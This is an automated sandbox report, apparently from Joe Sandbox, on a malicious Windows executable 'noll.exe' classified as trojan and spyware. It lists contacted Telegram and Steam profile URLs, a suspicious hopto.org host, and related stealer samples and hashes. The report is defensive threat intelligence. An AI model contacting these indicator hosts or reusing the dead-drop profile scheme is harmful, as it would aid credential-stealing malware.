                                                                                                                                                                        https://t.me/Fnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://recaptcha.net/recaptcha/;noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/profiles/76561199780418869/inventory/noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://steamcommunity.com/discussions/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://store.steampowered.com/stats/noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://medal.tvnoll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comnoll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://store.steampowered.com/steam_refunds/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=ennoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pnoll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://cowod.hopto.flarenoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://steamcommunity.com/workshop/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://login.steampowered.com/noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://store.steampowered.com/legal/noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://t.me/ae5ed&noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F7656119978041886976561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://cowod.hoptomlnoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://cowod.hopto.org/noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFmnoll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://recaptcha.netnoll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://store.steampowered.com/76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://127.0.0.1:27060noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&lnoll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                                              steamcommunity.comUnited States
                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                              149.154.167.99
                                                                                                                                                                                                                              t.meUnited Kingdom
                                                                                                                                                                                                                              62041TELEGRAMRUfalse
                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1577315
                                                                                                                                                                                                                              Start date and time:2024-12-18 11:36:20 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 5m 1s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:7
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:noll.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@6/2@3/2
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              • Number of executed functions: 48
                                                                                                                                                                                                                              • Number of non-executed functions: 103
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • VT rate limit hit for: noll.exe
                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              05:37:36API Interceptor1x Sleep call for process: noll.exe modified
                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              23.55.153.1061fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                  http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                  http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                  http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                  http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                  http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/?setln=pl
                                                                                                                                                                                                                                                  http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.org/
                                                                                                                                                                                                                                                  http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • telegram.dog/
                                                                                                                                                                                                                                                  LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                  • t.me/cinoshibot
                                                                                                                                                                                                                                                  jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                  • t.me/cinoshibot
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  t.meSetup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.26.10.61
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  steamcommunity.com1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                                  hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 104.121.10.34
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  TELEGRAMRUurS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  FileScanner.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                  Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  AKAMAI-ASN1EU1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  EXTERNALRe.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.44.201.32
                                                                                                                                                                                                                                                  ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.218.93.195
                                                                                                                                                                                                                                                  ardware-v1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                  • 23.43.121.120
                                                                                                                                                                                                                                                  https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 104.116.245.16
                                                                                                                                                                                                                                                  https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 172.232.25.148
                                                                                                                                                                                                                                                  jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 172.235.101.204
                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\noll.exe
                                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3254)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):35483
                                                                                                                                                                                                                                                  Entropy (8bit):5.363548319516386
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:I5pq/Ku4fmBC5ReOpfbzQlFNaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYM2n:I58/Ku4fmBC5ReOpfbaNaXfsW9l+X9hi
                                                                                                                                                                                                                                                  MD5:2AFE6A240F8C1D0651BD26C5B4A0CEE6
                                                                                                                                                                                                                                                  SHA1:1E4F06B0FEA11019CA5933CA351790E4B7690998
                                                                                                                                                                                                                                                  SHA-256:B9EBF2EDE460807493E75D5576C736323BD815257FA2237C31D0EBC0277AD219
                                                                                                                                                                                                                                                  SHA-512:947F53908AD2A75B072265CADC5B56C443A822BD86BCD9B6C26313801FC885BC9B37C7F3666783AA202E4D2D278505F1D9D139FE1CE528EF384206AB7C9863AA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: empty</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&amp;l=english&amp;_
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\noll.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1048575
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn:n
                                                                                                                                                                                                                                                  MD5:A6E2808F056135D60224752DA9008CA5
                                                                                                                                                                                                                                                  SHA1:F5692F744E5B853B26F260CEEB3F19033EA2B731
                                                                                                                                                                                                                                                  SHA-256:59FFEA4DC5A1A4383C2B0AA9F6DC51E84D688CCD166870128C536E47F33FE088
                                                                                                                                                                                                                                                  SHA-512:6029C52F964064D661268BBA8923F240A941A16587A87775929ED45AF8FB668556D2E22599A0A7B7FBC9406199A3C6D891AF124A34C1ADFD59810E0329F88463
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
